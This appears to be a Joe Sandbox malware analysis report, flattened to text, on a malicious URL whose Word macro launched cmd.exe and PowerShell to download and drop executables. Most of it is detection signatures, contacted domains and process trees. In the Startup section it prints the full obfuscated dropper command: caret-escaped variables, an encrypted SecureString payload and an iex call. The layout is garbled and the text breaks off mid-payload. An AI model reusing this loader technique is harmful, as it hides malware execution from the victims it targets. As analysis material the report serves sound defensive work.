ID: Cookbook: browseurl.jbs Time: 00:12:30 Date: 24/03/2018 Version:

Transcription

1 ID: Cookbook: browseurl.jbs Time: 00:12:30 Date: 24/03/2018 Version:

2 Table of Contents Analysis Report Overview General Information Detection Confidence Classification Analysis Advice Signature Overview AV Detection: Cryptography: Spam, unwanted Advertisements and Ransom Demands: Software Vulnerabilities: Networking: Boot Survival: Persistence and Installation Behavior: Data Obfuscation: Spreading: System Summary: HIPS / PFW / Operating System Protection Evasion: Anti Debugging: Malware Analysis System Evasion: Hooking and other Techniques for Hiding and Protection: Language, Device and Operating System Detection: Behavior Graph Simulations Behavior and APIs Antivirus Detection Initial Sample Dropped Files Unpacked PE Files Domains Yara Overview Initial Sample PCAP (Network Traffic) Dropped Files Memory Dumps Unpacked PEs Joe Sandbox View / Context IPs Domains ASN Dropped Files Screenshots Startup Created / dropped Files Contacted Domains/Contacted IPs Contacted Domains Contacted IPs Static File Info No static file info Network Behavior Network Port Distribution TCP Packets Table of Contents Copyright Joe Security LLC 2018 Page 2 of

3 UDP Packets DNS Queries DNS Answers HTTP Request Dependency Graph HTTP Packets Code Manipulations Statistics Behavior System Behavior Analysis iexplore.exe PID: 3756 Parent PID: 548 General File Activities Registry Activities Analysis iexplore.exe PID: 3816 Parent PID: 3756 General File Activities Registry Activities Analysis WINWORD.EXE PID: 2412 Parent PID: 3756 General File Activities File Created Registry Activities Key Created Analysis cmd.exe PID: 2224 Parent PID: 2412 General File Activities Analysis powershell.exe PID: 2296 Parent PID: 2224 General File Activities File Created File Written File Read Registry Activities Analysis OSPPSVC.EXE PID: 2220 Parent PID: 424 General Analysis exe PID: 2760 Parent PID: 2296 General Analysis exe PID: 2840 Parent PID: 2760 General Analysis PartitionClu.exe PID: 2504 Parent PID: 424 General Analysis PartitionClu.exe PID: 2544 Parent PID: 2504 General Disassembly Code Analysis Copyright Joe Security LLC 2018 Page 3 of 41

4 Analysis Report Overview General Information Joe Sandbox Version: Analysis ID: Start time: 00:12:30 Joe Sandbox Product: CloudBasic Start date: Overall analysis duration: Hypervisor based Inspection enabled: Report type: Cookbook file name: Sample URL: 0h 10m 48s light browseurl.jbs 8BD / Analysis system description: Windows 7 SP1 (with Office 2010 SP2, IE 11, FF 54, Chrome 60, Acrobat Reader DC 17, Flash 26, Java ) Number of analysed new started processes analysed: 13 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 0 Technologies Analysis stop reason: Detection: Classification: HCA enabled EGA enabled HDC enabled Timeout MAL mal100.evad.expl.troj.win@17/29@2/5 HCA Information: Successful, ratio: 96% Number of executed functions: 0 Number of non-executed functions: 0 EGA Information: Successful, ratio: 100% HDC Information: Successful, ratio: 27.5% (good quality ratio 20.4%) Quality average: 53.2% Quality standard deviation: 38.9% Cookbook Comments: Adjust boot time Correcting counters for adjusted boot time URL browsing timeout Warnings: Show All Exclude process from analysis (whitelisted): WmiPrvSE.exe, conhost.exe, dllhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtQueryVolumeInformationFile calls found. Skipping Hybrid Code Analysis (implementation is based on Java,.Net, VB or Delphi, or parses a document) for: WINWORD.EXE, powershell.exe Copyright Joe Security LLC 2018 Page 4 of 41

5 Detection Strategy Score Range Reporting Detection Threshold Report FP / FN Confidence Strategy Score Range Further Analysis Required? Confidence Threshold Classification Copyright Joe Security LLC 2018 Page 5 of 41

6 Ransomware Miner Spreading malicious malicious malicious Evader Phishing suspicious suspicious suspicious clean clean clean Exploiter Banker Spyware Trojan / Bot Adware Analysis Advice Sample HTTP request are all non existing, likely the sample is no longer working Signature Overview Detection AV Cryptography unwanted Advertisements and Ransom Demands Spam, Vulnerabilities Software Networking Survival Boot and Installation Behavior Persistence Obfuscation Data Spreading Summary System HIPS / PFW / Operating System Protection Evasion Copyright Joe Security LLC 2018 Page 6 of 41

7 Anti Debugging Malware Analysis System Evasion Hooking and other Techniques for Hiding and Protection Language, Device and Operating System Detection Click to jump to signature section AV Detection: Multi AV Scanner detection for domain / URL Cryptography: Uses Microsoft's Enhanced Cryptographic Provider Spam, unwanted Advertisements and Ransom Demands: Contains functionality to import cryptographic keys (often used in ransomware) Software Vulnerabilities: Browser exploit detected (process start blacklist hit) Document exploit detected (process start blacklist hit) Networking: Detected TCP or UDP traffic on non-standard ports Uses known network protocols on non-standard ports HTTP GET or POST without a user agent Social media urls found in memory data Contains functionality to download additional files from the internet Downloads files Downloads files from webservers via HTTP Found strings which match to known social media urls Performs DNS lookups Posts data to webserver Tries to download non-existing http data (HTTP/ Not Found) Urls found in memory or binary data Boot Survival: Drops PE files to the user root directory Contains functionality to start windows services Persistence and Installation Behavior: Drops executables to the windows directory (C:\Windows) and starts them Drops PE files Copyright Joe Security LLC 2018 Page 7 of 41

8 Drops PE files to the user directory Drops PE files to the windows directory (C:\Windows) Data Obfuscation: Document contains an embedded VBA with many randomly named variables Obfuscated command line found PE file contains sections with non-standard names Uses code obfuscation techniques (call, push, ret) Binary may include packed or encrypted code Spreading: Creates COM task schedule object (often to register a task for autostart) Enumerates the file system System Summary: Document contains an embedded VBA macro which executes code when the document is opened / closed Document contains an embedded VBA macro which may execute processes Document contains an embedded VBA macro with suspicious strings Document contains an embedded VBA with hexadecimal encoded strings Powershell connects to network Powershell drops PE file Very long command line found Creates mutexes Detected potential crypto function Reads the hosts file Binary contains paths to development resources Classification label Contains functionality to create services Contains functionality to modify services (start/stop/modify) Creates files inside the user directory Creates temporary files Parts of this applications are using the.net runtime (Probably coded in C#) Reads ini files Reads software policies Spawns processes Uses an in-process (OLE) Automation server Found graphical window changes (likely an installer) Uses Microsoft Silverlight Checks if Microsoft Office is installed Uses new MSVCR Dlls Binary contains paths to debug symbols HIPS / PFW / Operating System Protection Evasion: Very long cmdline option found, this is very uncommon (may be encrypted or packed) May try to detect the Windows Explorer process (often used for injection) Anti Debugging: Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation)) Checks if the current process is being debugged Contains functionality to read the PEB Copyright Joe Security LLC 2018 Page 8 of 41

9 Contains functionality which may be used to detect a debugger (GetProcessHeap) Enables debug privileges Creates guard pages, often used to prevent reverse engineering and debugging Malware Analysis System Evasion: Checks the free space of harddrives Contains functionality to enumerate running services Contains long sleeps (>= 3 min) Enumerates the file system Found large amount of non-executed APIs May sleep (evasive loops) to hinder dynamic analysis Queries disk information (often used to detect virtual machines) Program exit points Queries a list of all running processes Hooking and other Techniques for Hiding and Protection: System process connects to network (likely due to code injection or exploit) Uses known network protocols on non-standard ports Starts Microsoft Word (often done to prevent that the user detects that something wrong) Stores large binary data to the registry Disables application error messsages (SetErrorMode) Language, Device and Operating System Detection: Queries the installation date of Windows Queries the volume information (name, serial number etc) of a device Contains functionality to query windows version Queries the cryptographic machine GUID Behavior Graph Copyright Joe Security LLC 2018 Page 9 of 41

10 Behavior Graph Hide Legend ID: URL: Startdate: 24/03/2018 Architecture: WINDOWS Legend: Process Score: 100 Signature Multi AV Scanner detection for domain / URL Obfuscated command line found Very long command line found 7 other signatures started started started Created File iexplore.exe PartitionClu.exe OSPPSVC.EXE DNS/IP Info Is Dropped fscadvogados.net.br , 50446, 50955, GOOGLE-GoogleIncUS United States Is Windows Process started started started Number of created Registry Values Browser exploit detected (process start blacklist hit) Drops executables to the windows directory (C:\Windows) and starts them Number of created Files WINWORD.EXE iexplore.exe PartitionClu.exe Visual Basic Delphi , 49175, 49176, 80 IO-DATA-CENTERS-IOCapitalPrincessLLCUS United States started , 4143, INFORTELECOM-ASES Spain , 4143, AS GO-DADDY-COM-LLC-GoDaddycomLLCUS United States Java.Net C# or VB.NET Obfuscated command line found Very long command line found Document exploit detected (process start blacklist hit) Detected TCP or UDP traffic on non-standard ports C, C++ or other language cmd.exe Is malicious Very long command line found started powershell.exe 12 9 fscadvogados.net.br , 49181, 80 dropped SCSOLUCOESEMTECNOLOGIASABR Brazil C:\Users\Public\72312.exe, PE32 started System process connects to network (likely due to code injection or exploit) Drops PE files to the user root directory Powershell connects to network Powershell drops PE file exe started exe Simulations Behavior and APIs Time Type Description 00:12:38 API Interceptor 1613x Sleep call for process: iexplore.exe modified 00:12:56 API Interceptor 5x Sleep call for process: WINWORD.EXE modified 00:12:59 API Interceptor 3x Sleep call for process: OSPPSVC.EXE modified 00:13:00 API Interceptor 1x Sleep call for process: powershell.exe modified 00:13:08 API Interceptor 3x Sleep call for process: exe modified 00:13:11 API Interceptor 2x Sleep call for process: PartitionClu.exe modified Antivirus Detection Initial Sample Detection Scanner Label Link 0% virustotal Browse Dropped Files No Antivirus matches Unpacked PE Files No Antivirus matches Copyright Joe Security LLC 2018 Page 10 of 41

11 Domains Detection Scanner Label Link 0% virustotal Browse fscadvogados.net.br 7% virustotal Browse Yara Overview Initial Sample No yara matches PCAP (Network Traffic) No yara matches Dropped Files No yara matches Memory Dumps No yara matches Unpacked PEs No yara matches Joe Sandbox View / Context IPs No context Domains No context ASN No context Dropped Files No context Screenshots Copyright Joe Security LLC 2018 Page 11 of 41

12 Startup System is w7 iexplore.exe (PID: 3756 cmdline: '' -Embedding CA1F703CD665867E8132D2946FB55750) iexplore.exe (PID: 3816 cmdline: '' SCODEF:3756 CREDAT: /prefetch:2 CA1F703CD665867E8132D2946FB55750) WINWORD.EXE (PID: 2412 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet File s\content.ie5\9cmfzc4r\dya doc 5D798FF0BE2A8970D ACFD9D) cmd.exe (PID: 2224 cmdline: 'C:\Windows\System32\cmd.exe' jztczaqyakrjk hhrpikpliorchjqvijdoiil cujilsvimefe & %^c^o^m^s^p^e^c^% %^c^o^m^s^p^e^c^% /V /c set %TZfApwwiZBdNVYE%=tCdpsdJfDwIiJ&&set %dmtulqgzipx%=p&&set %KOCCYlKMPbjV%=o^w&&set %wirllmhmvcajibq%=eznqpuiwsmq&&set %FEiiwZhu hwarr%=!%dmtulqgzipx%!&&set %QzzqpRUcsMBKMwa%=ADJOCTEwZu&&set %KYAUwGYMdUV%=e^r&&set %ABcRUHZtjThYd%=!%KOCCYlKMPbjV%!&&set %wttupze%=s&&set %oucautyvrnylkok%=zpdobtozitiyow&&set %ICzHldZ%=he&&set %iobgxsb%=ll&&!%feiiwzhuhwarr%!!%abcruhztjthyd%!!%kyau wgymduv%!!%wttupze%!!%iczhldz%!!%iobgxsb%! ' ([runtime.interopservices.marshal]::([runtime.interopservices.marshal].getmembers()[2].name).in voke([runtime.interopservices.marshal]::securestringtoglobalallocunicode($('76492d f b16050a5345mgb8ag0atgbsadkalwbnafkavabcafga bwbiahuaawboahcamqbrae0amga3aeeapqa9ahwamga0agmanqbjadaanqa4adgaoaa0agqamqayadkanqaxadcazabladuazqayagyaoqa2ag EAMAA1ADcAMAAwADQAYQAwADMAZQAwADQANQBlAGYAZgBjADkANgBhADQAMgA4ADMAMgBlAGMAZAA1ADIANQAyADYAZgBmADIANgA4AGEAYwBk ADUAYwBkAGYANABmADAANQA0ADAAMAAzADYANQBlAGQAYgAxADQANAA1ADYAZQAzADUAMQA1AGMANwA0AGUAMQAxADgANgAzADAAZABjADEANQ A1ADYAZQA3ADcANQA4ADIAZQAyADgAYQBhADUAOAA4ADMAMgA5ADgAOQBlAGIANgBlADkAZgBiADYANQAxAGIAMwAyAGMAYQA1ADEAZABhADEANAA4AGUAZA BlADYAZgA5ADcAZABkAGUANgBmAGMAOQBlADgAOABiADIAOQA2AGQAMAAyAGIANwA3AGMAZgA5ADUANQA5AGYAOQBlADYAMQA5AGMANAAwAGIA NwAwADMAMgA5ADcAOAAwADAAMQAzADYANwA2ADkANgBlADEAYgBjADAAZAAxAGEANQAzADcANQA4AGQAZABmADgANQAwADUAOAAyADcANgA2AG IAOAAwADYAMQA0ADMAMAAyADcAMgA3ADgANgAyADYAOQAyAGEANABmADAAOABkADkAYwA5ADEAMgBkADEANwA0ADcAOAA1ADQANgBhADcANwA2 AGEAOQAwADgAMgAxADUAMABiADUAOQAxADUAZABhADMAYwBjADAAYwAwAGQAMABhADAAYQAwADkAYwAwAGIAZABmAGIAZgBmAGUANQBmADEAYg A1AGYAOQAxADcAYgA4AGYANgBlAGIAMQA0ADMAZgAzAGIANQAxADgAMQBhAGMAYwBiAGYANgA3ADEAMgA3AGQANwBmAGIAZgA5AGYAMQA5ADcA MwBlADUAZQAyADkAMQBmADMAYgA3AGUAOQA0ADkAMQAxAGEAMABkAGMAZABmADMANQA5ADkAMABkAGMAMgBhAGMAOAA3ADkAOAAyADEAZQA1AD IAMgAyADAAYgBhADgANgAyADEAOAAyAGQAMAA1ADMANQA4AGMAYQBiADYAYQAxADUAMwBhAGYAYwBjAGEANAAwADgAYgAzAGEANwBjADYAZgA5 ADUAMAA1AGUAMAAwADkANQAyAGYAMAAzAGQAYQAwADQAMwBlADgANQA1ADMAYgA2AGYAYwA5ADAAMwAxAGMAZAAwADAAOQAwADEAZQAzAGQAOQ A0ADkAMAAyADkANQBhADEAZgA3AGQAZQA2ADEAOAA1AGYANwBiAGQANQAyADAAOQAxAGIAOQAzADkAZgBkAGQANgA4AGQAMQA2AGUAMgA1ADcA MgBhADkAYgAzADQAYgBkADkAZAAxAGQAMgA3ADkAZQBhADYAZQAwAGIAOAA4ADkAMwA2AGQANgA4ADEAOABhADMAMwA4ADMANwA4ADEAZgA3AD kazqayadqamwa1adaamwbiadeaoqa0agqamqa4adgazqbmaduanwa0agiaoqbjadyazaa0agiayqbiaguanqayadiamgazadaaoaa4adgamqay ADAAZQAxADMANwAwAGIAMwA0AGIAOAA2AGIAYwBjADQAMgAwADgAYgA2ADIANwBjADcAZQAwAGEAYwAyADYAOABkADkAMgBlADUAMwAwADkAZA AwAGYAYwA0ADIAMgA2ADgANgAyAGMAOQBmADgAYgA2AGMAOAA5AGYAMgA2ADcAYQAxADUANQA0AGEANAA0ADMAZQA2ADYANwAzADAAOQBhADgA YwBkADcAOABiADYAMgBiAGMAZABiAGYAOQA2AGQANgA2ADEANgA4AGQANwA1AGEAYwAxADQANQAyAGYAYQAwADcAZQBjADgAMQA1ADYANwAzAD kazga1agiazga0adyaoaa2adeamga2adaayqbladyamaazadiangbkadkamqawaguazabiagmazqbjaguanabkadqamqbiagqanwbmagyaywax ADYAMgAzADQANAAyADQAYgA4ADIANAA4ADgAZgAwADYANAAzADQAZQA5AGYAOQBjADUAOABkAGUAMgBlADAAMAAzADEAZgA2ADAAMQAwAGQAMg Copyright Joe Security LLC 2018 Page 12 of 41

13 BjADcAOABiAGEAMQBhADkANAA2AGQAMwA5ADAAYQA3AGMAMAAyADEAMgBkAGYANgAxADIAMgAyAGQAZgA0AGMAMwBlAGIAOAAxADIAMAA2ADEA MAAwAGQAYQBiADQAOAA5AGMAZQA1AGQAZQA3AGUAMgA4ADAAMAA3ADYANABiAGMAOQA0ADcAYgAyAGIANQA5ADYAMQAzADcAMwA2ADYANQA2AD QAYQA1AGIAMwAwAGIANAA4ADEAMgA3AGEANQAwADIAMgBmAGYAYQA2AGMANQBkADYAYwA5ADIAYgAyAGIAMgBhADAANwBiAGMAMABjAGMAOQBh ADgAMgBhADAAMAA5AGUAOAAzADYANQAzADQAZgA4ADIANQBmADEAMwAzAGEAYwBkADIAZAAyAGUANQA4ADcANwBjAGUAOQBhAGMAMwA5ADkAZA BlAGYAMABiADMAMwAwADQAMAAxADAAYQA2ADkAYgBlAGQANgBkADYAZQAzADYAYgAyADQAYwA0ADAANgA2ADUANABmADYAOQA3AGEAMQA4AGYA NQBmADAAMgBkAGIAMAA2ADEAZgBmADIAYQA2ADYAMgA5ADMANQAwADMAMQA1AGMAMwA4AGMAYwA2ADEAYgAwAGQAYQA0ADgAYQA1AGUAOAA3AD kamabhadmaoabjagmamwayadkazgbkaduaoaayadeaoqa2agmanwa0adgamqazadgazaa4aguamqa1agmaoabhadgamqbmadaamqa2adkaygbh ADUAMgAzAGMAZgA3ADgAMwBhAGQAMwAxAGUAYgA0ADQAMgA0AGIAZgA4ADIANgBhADUAYgA3ADkANgA4ADYAOABhADIAMgBlADUAYQA1ADUAMg BhAGYAMwA2ADUANwBiAGMANQBkADIANQBmAGMAZQBmADYAYgAyAGYAMwA1ADIAMABkAGQAYwAyADkAOQA5ADYAMQBkADAAMQBkAGMANwBkAGMA YgAyADEAMAA4ADcAZgAzAGEAMwAwAGIAOAAwADMANwAzADMAYwAwADkAZQAwAGQAMAAwADcAYgA1ADgANQBmAGUAMQBkAGUAYwBmADQAMgAyAD YANwA4AGUAMAA3AGQANgA4ADkAOAA5ADYAZAA0ADcAZgA3ADYAYwA1AGIAOQA3ADAANwA2ADgAZAA3ADEAZgA2AGQAYgA4ADMAYQA5ADcAMAA5 AGYAZQBiADIAYgA1AGIAYwA1ADAAYgA3ADYAZAA5AGUANwAzAGYAZABiADUAMQAxADcAZgBkAGEAMQA2AGIAMwBiADYAMQBmAGQAMgAzADIAZABiAGYAYQBh ADMANQBkADcAYwA0ADIAOABlAGQAZAA3ADYAYQAwADgAZgAzADAAMQBiADQANwAzAGMAZQBhAGQANABmAGMAZABhADIAZQA1ADMANAA5AGUANg AyAGMANQBlAGEAYwBkADMAOQBkAGEAMQA3AGIAZAA1AGMAYwAyADIAZABjADYANgAyADUAYwAyADcANABhAGMAYwBlAGIAMQA4AGEAMgAxAGIAZgA0ADMAZg BhADkAYgA5ADIANABlADcAZgAwADYAMAA5ADEANAAxADIAZQA4AGEANwBiADgAZgBiADcAYQA1AGUAYwA4AGUAZABmAGQANQAyAGIAYgBmAGQAMAA2ADQANg A5ADQAYgA1ADIAMABlADYANgBjAGUAMAA0AGQAYwA4AGUAOQAxADQAZQBkADMAOAA4AGYAMQBmADAANgA4ADAAMgA4ADQAYwAxAGQAYQA0ADYA MwA1AGQAMAAxADMANgA5AGMANAA4ADMAYgAwAGYAZgA4ADcAMAAwADUAZABkADkAMQA1ADEANAAyADQAZgA2ADkAZAAzADgANgA1ADUANgBjAD IAMQA2ADMAOAA0ADQAZAAwADgAZQBjADkAZQA1AGQANgBjADgAZABjADcAMwAxADUANAA3AGMANwA0ADQAMAA4AGEANAAwAGEAYwA3ADUAZgBi ADkAOAAxAGUAOQBjADkAMAAxADcANwA4AGUAOABkADQAYgBjAGIAYQAzADgAOQBjAGQAYQA2AGIAYQAwAGUAYwBjADEAMwA5AGMAMgBhAGEAOA AwAGEAMQA3ADMAYQAzADEANAAwAGYANwBlADgAYwA3ADEAMABhADIAYwA2ADAAMgBkAGMANgBjADMANwAzADEAMwA4ADYAOQAzADUAOQA0ADUA MQA3AGIANwAwAGMAOABjAGQANAAzADIAZgBhAGMAYQA2ADUANQA3AGEAMwA1AGMAMQAwADMANAA2AGQANgBjADMAZQAyADMANQBjADUAYgBlAD IAYwAwADIANQA4AGQAMAA2AGIAYQA2ADEAMQAwADkAZABhADQAZgBlAGEAOQA1ADIAOQAxADUANwAxAGEAOABmADgAYwA2AGIAMQA1ADEAZQA1 ADkANwAyADUANwBmADAANABmADAAZQBhADkAYwA0ADIAZQAyADIAOQA2AGYAOAA4ADcAMwBhADgAYQAxAGYAOQBlADYANwBmADYAOABhAGEAMw A1AGMANwA4ADcAYQBiADMANAAwAGUAZgAzAGIAYgBjADAAMQA2AGEAMgAwAGQAYgBmADkANAA4AGEANwAxADgAOQA1AGUAYwA5ADIAMwBhADMA YQAxAGQANwA4ADMAOABjAGMAMgBlADQAZgA0AGMAZAAxADEAZQBiADYAMQBmAGQAOQA0ADQAYwA1ADEAMgAyADUAOAA0AGEAOQAyADEAOQAwAD caygaxaguanwa1agqazaa5agmanwbmadeanqaxadmazga4ageanwayagyaoqa1agyazgbkadiaywa4adqanwawadqayqawadaanga1adkanga1 ADcAOABkADcAZQBiADcAZgAzADgAZQAwADIAMwA3ADAANAA2ADQAMQA5AGIAYQA4AGIAZABkADYAMQA3ADgANQBkADkANQA2AGIAZQA2AGQANQ AxADAAOAAwADcAZAA0AGMANAA4AGIAYgBkADMAOAAwAGEAMAAyADkAOQAzADYAMwBhADMAOAA4ADgANgBhAGUANABlADMANgA0ADcAMQA4ADkA ZgAxADEAYwAzADQAZABhADYAYgBiAGUAMwAyAGEANQAwADEAZgBhADQANQAwAGYANABkADkAMwAwADUAMgA5ADAAMgA5ADcAZgA2ADcANQAyAD MANwAyADgAYQA5ADQANQBiAGEAZAAzAGIANABmADkAZAA2AGMAYwA4ADQANAA1ADEANQA5AGMAOAAyADAAOABiAGQAZAAyAGMANQAzADkAOQAx ADkAZQA0ADQAMgA3ADcAMAA0ADAAOAA0AGUAOAA4AGIAOQBlADAAOQA3ADkAYQBkADQAMQA0ADkAZQA3AGMAOQA2ADQAYQA4ADAAZQAzADMAYg A3ADYANwAxADUAMQAwAGIANAA2AGQAMABlAGYANgA4ADYAMQBlADMAMgAwAGMAMQAwAGYAZQA4AGUAOQA5AGIAYwA5AGIAMwA4AGYAYwAzAA== ' CONVerttO-sEcuReStriNg -key (88..65))) )) iex AD7B9C14083B52BC532FBA B98) powershell.exe (PID: 2296 cmdline: powershell ' ([runtime.interopservices.marshal]::([runtime.interopservices.marshal].getmembers()[2].name).invo ke([runtime.interopservices.marshal]::securestringtoglobalallocunicode($('76492d f b16050a5345mgb8ag0atgbsadkalwbnafka VABCAFgAbwBiAHUAawBOAHcAMQBRAE0AMgA3AEEAPQA9AHwAMgA0AGMANQBjADAANQA4ADgAOAA0AGQAMQAyADkANQAxADcAZABlADUAZQAyAG YAOQA2AGEAMAA1ADcAMAAwADQAYQAwADMAZQAwADQANQBlAGYAZgBjADkANgBhADQAMgA4ADMAMgBlAGMAZAA1ADIANQAyADYAZgBmADIANgA4 AGEAYwBkADUAYwBkAGYANABmADAANQA0ADAAMAAzADYANQBlAGQAYgAxADQANAA1ADYAZQAzADUAMQA1AGMANwA0AGUAMQAxADgANgAzADAAZA BjADEANQA1ADYAZQA3ADcANQA4ADIAZQAyADgAYQBhADUAOAA4ADMAMgA5ADgAOQBlAGIANgBlADkAZgBiADYANQAxAGIAMwAyAGMAYQA1ADEA ZABhADEANAA4AGUAZABlADYAZgA5ADcAZABkAGUANgBmAGMAOQBlADgAOABiADIAOQA2AGQAMAAyAGIANwA3AGMAZgA5ADUANQA5AGYAOQBlAD YAMQA5AGMANAAwAGIANwAwADMAMgA5ADcAOAAwADAAMQAzADYANwA2ADkANgBlADEAYgBjADAAZAAxAGEANQAzADcANQA4AGQAZABmADgANQAw ADUAOAAyADcANgA2AGIAOAAwADYAMQA0ADMAMAAyADcAMgA3ADgANgAyADYAOQAyAGEANABmADAAOABkADkAYwA5ADEAMgBkADEANwA0ADcAOA A1ADQANgBhADcANwA2AGEAOQAwADgAMgAxADUAMABiADUAOQAxADUAZABhADMAYwBjADAAYwAwAGQAMABhADAAYQAwADkAYwAwAGIAZABmAGIA ZgBmAGUANQBmADEAYgA1AGYAOQAxADcAYgA4AGYANgBlAGIAMQA0ADMAZgAzAGIANQAxADgAMQBhAGMAYwBiAGYANgA3ADEAMgA3AGQANwBmAG IAZgA5AGYAMQA5ADcAMwBlADUAZQAyADkAMQBmADMAYgA3AGUAOQA0ADkAMQAxAGEAMABkAGMAZABmADMANQA5ADkAMABkAGMAMgBhAGMAOAA3 ADkAOAAyADEAZQA1ADIAMgAyADAAYgBhADgANgAyADEAOAAyAGQAMAA1ADMANQA4AGMAYQBiADYAYQAxADUAMwBhAGYAYwBjAGEANAAwADgAYg AzAGEANwBjADYAZgA5ADUAMAA1AGUAMAAwADkANQAyAGYAMAAzAGQAYQAwADQAMwBlADgANQA1ADMAYgA2AGYAYwA5ADAAMwAxAGMAZAAwADAA OQAwADEAZQAzAGQAOQA0ADkAMAAyADkANQBhADEAZgA3AGQAZQA2ADEAOAA1AGYANwBiAGQANQAyADAAOQAxAGIAOQAzADkAZgBkAGQANgA4AG QAMQA2AGUAMgA1ADcAMgBhADkAYgAzADQAYgBkADkAZAAxAGQAMgA3ADkAZQBhADYAZQAwAGIAOAA4ADkAMwA2AGQANgA4ADEAOABhADMAMwA4 ADMANwA4ADEAZgA3ADkAZQAyADQAMwA1ADAAMwBiADEAOQA0AGQAMQA4ADgAZQBmADUANwA0AGIAOQBjADYAZAA0AGIAYQBiAGUANQAyADIAMg AzADAAOAA4ADgAMQAyADAAZQAxADMANwAwAGIAMwA0AGIAOAA2AGIAYwBjADQAMgAwADgAYgA2ADIANwBjADcAZQAwAGEAYwAyADYAOABkADkA MgBlADUAMwAwADkAZAAwAGYAYwA0ADIAMgA2ADgANgAyAGMAOQBmADgAYgA2AGMAOAA5AGYAMgA2ADcAYQAxADUANQA0AGEANAA0ADMAZQA2AD YANwAzADAAOQBhADgAYwBkADcAOABiADYAMgBiAGMAZABiAGYAOQA2AGQANgA2ADEANgA4AGQANwA1AGEAYwAxADQANQAyAGYAYQAwADcAZQBj ADgAMQA1ADYANwAzADkAZgA1AGIAZgA0ADYAOAA2ADEAMgA2ADAAYQBlADYAMAAzADIANgBkADkAMQAwAGUAZABiAGMAZQBjAGUANABkADQAMQ BiAGQANwBmAGYAYwAxADYAMgAzADQANAAyADQAYgA4ADIANAA4ADgAZgAwADYANAAzADQAZQA5AGYAOQBjADUAOABkAGUAMgBlADAAMAAzADEA ZgA2ADAAMQAwAGQAMgBjADcAOABiAGEAMQBhADkANAA2AGQAMwA5ADAAYQA3AGMAMAAyADEAMgBkAGYANgAxADIAMgAyAGQAZgA0AGMAMwBlAG IAOAAxADIAMAA2ADEAMAAwAGQAYQBiADQAOAA5AGMAZQA1AGQAZQA3AGUAMgA4ADAAMAA3ADYANABiAGMAOQA0ADcAYgAyAGIANQA5ADYAMQAz ADcAMwA2ADYANQA2ADQAYQA1AGIAMwAwAGIANAA4ADEAMgA3AGEANQAwADIAMgBmAGYAYQA2AGMANQBkADYAYwA5ADIAYgAyAGIAMgBhADAANw BiAGMAMABjAGMAOQBhADgAMgBhADAAMAA5AGUAOAAzADYANQAzADQAZgA4ADIANQBmADEAMwAzAGEAYwBkADIAZAAyAGUANQA4ADcANwBjAGUA OQBhAGMAMwA5ADkAZABlAGYAMABiADMAMwAwADQAMAAxADAAYQA2ADkAYgBlAGQANgBkADYAZQAzADYAYgAyADQAYwA0ADAANgA2ADUANABmAD YAOQA3AGEAMQA4AGYANQBmADAAMgBkAGIAMAA2ADEAZgBmADIAYQA2ADYAMgA5ADMANQAwADMAMQA1AGMAMwA4AGMAYwA2ADEAYgAwAGQAYQA0 ADgAYQA1AGUAOAA3ADkAMABhADMAOABjAGMAMwAyADkAZgBkADUAOAAyADEAOQA2AGMANwA0ADgAMQAzADgAZAA4AGUAMQA1AGMAOABhADgAMQ BmADAAMQA2ADkAYgBhADUAMgAzAGMAZgA3ADgAMwBhAGQAMwAxAGUAYgA0ADQAMgA0AGIAZgA4ADIANgBhADUAYgA3ADkANgA4ADYAOABhADIA MgBlADUAYQA1ADUAMgBhAGYAMwA2ADUANwBiAGMANQBkADIANQBmAGMAZQBmADYAYgAyAGYAMwA1ADIAMABkAGQAYwAyADkAOQA5ADYAMQBkAD AAMQBkAGMANwBkAGMAYgAyADEAMAA4ADcAZgAzAGEAMwAwAGIAOAAwADMANwAzADMAYwAwADkAZQAwAGQAMAAwADcAYgA1ADgANQBmAGUAMQBk AGUAYwBmADQAMgAyADYANwA4AGUAMAA3AGQANgA4ADkAOAA5ADYAZAA0ADcAZgA3ADYAYwA1AGIAOQA3ADAANwA2ADgAZAA3ADEAZgA2AGQAYg A4ADMAYQA5ADcAMAA5AGYAZQBiADIAYgA1AGIAYwA1ADAAYgA3ADYAZAA5AGUANwAzAGYAZABiADUAMQAxADcAZgBkAGEAMQA2AGIAMwBiADYA MQBmAGQAMgAzADIAZABiAGYAYQBhADMANQBkADcAYwA0ADIAOABlAGQAZAA3ADYAYQAwADgAZgAzADAAMQBiADQANwAzAGMAZQBhAGQANABmAG MAZABhADIAZQA1ADMANAA5AGUANgAyAGMANQBlAGEAYwBkADMAOQBkAGEAMQA3AGIAZAA1AGMAYwAyADIAZABjADYANgAyADUAYwAyADcANABh AGMAYwBlAGIAMQA4AGEAMgAxAGIAZgA0ADMAZgBhADkAYgA5ADIANABlADcAZgAwADYAMAA5ADEANAAxADIAZQA4AGEANwBiADgAZgBiADcAYQ A1AGUAYwA4AGUAZABmAGQANQAyAGIAYgBmAGQAMAA2ADQANgA5ADQAYgA1ADIAMABlADYANgBjAGUAMAA0AGQAYwA4AGUAOQAxADQAZQBkADMA OAA4AGYAMQBmADAANgA4ADAAMgA4ADQAYwAxAGQAYQA0ADYAMwA1AGQAMAAxADMANgA5AGMANAA4ADMAYgAwAGYAZgA4ADcAMAAwADUAZABkAD kamqa1adeanaayadqazga2adkazaazadganga1aduangbjadiamqa2admaoaa0adqazaawadgazqbjadkazqa1agqangbjadgazabjadcamwax ADUANAA3AGMANwA0ADQAMAA4AGEANAAwAGEAYwA3ADUAZgBiADkAOAAxAGUAOQBjADkAMAAxADcANwA4AGUAOABkADQAYgBjAGIAYQAzADgAOQ BjAGQAYQA2AGIAYQAwAGUAYwBjADEAMwA5AGMAMgBhAGEAOAAwAGEAMQA3ADMAYQAzADEANAAwAGYANwBlADgAYwA3ADEAMABhADIAYwA2ADAA 